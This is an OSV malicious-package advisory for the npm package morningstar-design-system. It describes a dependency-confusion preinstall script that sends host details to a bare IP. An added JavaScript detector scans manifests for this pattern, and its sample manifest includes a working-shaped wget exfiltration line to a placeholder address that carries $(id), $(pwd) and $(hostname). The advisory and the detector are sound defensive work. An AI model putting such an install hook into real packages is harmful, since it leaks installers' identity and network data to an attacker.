MAL-2026-5449

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5449
Published
2026-06-09T17:34:46Z
Modified
2026-06-09T19:01:29.458566023Z
Summary
Malicious code in morningstar-design-system (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e)

On npm install, the package's preinstall lifecycle script runs wget against a hardcoded bare-IP HTTP endpoint, passing the output of the id, pwd, hostname, and ip a commands as URL query parameters. This leaks the installing user's username/UID/GID, working directory, hostname, and full network interface configuration to an attacker-controlled host automatically, before any other code runs. The package name targets Morningstar's organizational namespace and is published at an absurd 99.0.1 version, the canonical dependency-confusion shape designed to override an internal package of the same name. The README self-identifies as a dependency-confusion PoC. Whether labeled research or not, the published artifact actively exfiltrates installer data to a third-party IP and is unsafe to install in any environment.
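One way a CI gate or registry proxy could surface the pattern this advisory describes, as an added example that is not code from the OSV record or from the package: it inspects package.json lifecycle scripts for a downloader aimed at a bare-IP URL and for shell expansions of host-identifying commands, and separately flags an implausibly high major version. The sample manifest, the 192.0.2.10 address (documentation range) and the maxMajor threshold are constructed assumptions, not values from the record.

```javascript
// Added example: audit an npm manifest for the install-time exfiltration
// shape described in the advisory. Not the advisory's or the package's code.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
const DOWNLOADERS = /\b(wget|curl)\b/;
// http(s):// followed by a dotted-quad address, with an optional port.
const BARE_IP_URL = /https?:\/\/(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/;
// Command substitutions of host-identifying tools being stuffed into a URL.
const HOST_INFO = /\$\((id|pwd|hostname|ip a|ifconfig|whoami)\)/;

// Returns a list of findings; an empty list means nothing matched.
function auditManifest(pkg, { maxMajor = 50 } = {}) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const ipMatch = cmd.match(BARE_IP_URL);
    if (DOWNLOADERS.test(cmd) && ipMatch) {
      findings.push({ hook, rule: "downloader-to-bare-ip", ip: ipMatch[1] });
    }
    if (HOST_INFO.test(cmd)) {
      findings.push({ hook, rule: "host-info-expansion" });
    }
  }
  // Dependency-confusion uploads favour a version no internal build would reach.
  const major = parseInt(String(pkg.version || "0").split(".")[0], 10);
  if (Number.isFinite(major) && major >= maxMajor) {
    findings.push({ hook: null, rule: "implausible-major-version", version: pkg.version });
  }
  return findings;
}

// Constructed sample manifest mirroring the advisory's description;
// 192.0.2.10 is a placeholder, not the real endpoint.
const SAMPLE_MANIFEST = {
  name: "example-design-system",
  version: "99.0.1",
  scripts: {
    preinstall: 'wget -qO- "http://192.0.2.10/c?u=$(id)&d=$(pwd)&h=$(hostname)"',
    test: "node test.js",
  },
};

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
```

A manifest whose only lifecycle script is something like `node build.js` at version 1.2.3 produces no findings, so the check can run on every dependency without noise from ordinary packages.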

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005075",
            "import_time": "2026-06-09T17:45:52.969057726Z",
            "sha256": "18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:35:31Z",
            "versions": [
                "99.0.1"
            ]
        },
        {
            "id": "IN-MAL-2026-005066",
            "import_time": "2026-06-09T17:45:52.33397188Z",
            "sha256": "b7c142e1dbd0c447de86c8f45555623eec0ca091eb202b435865aaa5688c76de",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:34:46Z",
            "versions": [
                "99.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-005123",
            "import_time": "2026-06-09T18:50:17.395581784Z",
            "sha256": "06a27dd57899084595fca32ae35722b70847a43879cb19a17b1d21f95fb6840a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:45:56Z",
            "versions": [
                "99.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / morningstar-design-system

Package

Name
morningstar-design-system
Purl
pkg:npm/morningstar-design-system

Affected ranges

Affected versions

99.*
99.0.0
99.0.1
99.0.2

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "c6baf6fd432a663cf231f93848d0286121864c60d167e54e64c6e8c819584fa2",
            "tlsh": "c611ef78d730ad330fe50ae0947a12167673fae78d066c1da6d2100fdb0e9d3207c01a"
        }
    ],
    "package_integrity": [
        {
            "filename": "morningstar-design-system-99.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-mRsaNIScm4W4V3+d8aD0yP2L6SJP1khxHgzZLKbfQjtLgdvzUTL2LthDKCDIZBr1gHl+oomciLUs1ALrhj9r1g==",
                "sha1": "fbc61e4d181354b087d7a4032de79a54c8a60af0"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json"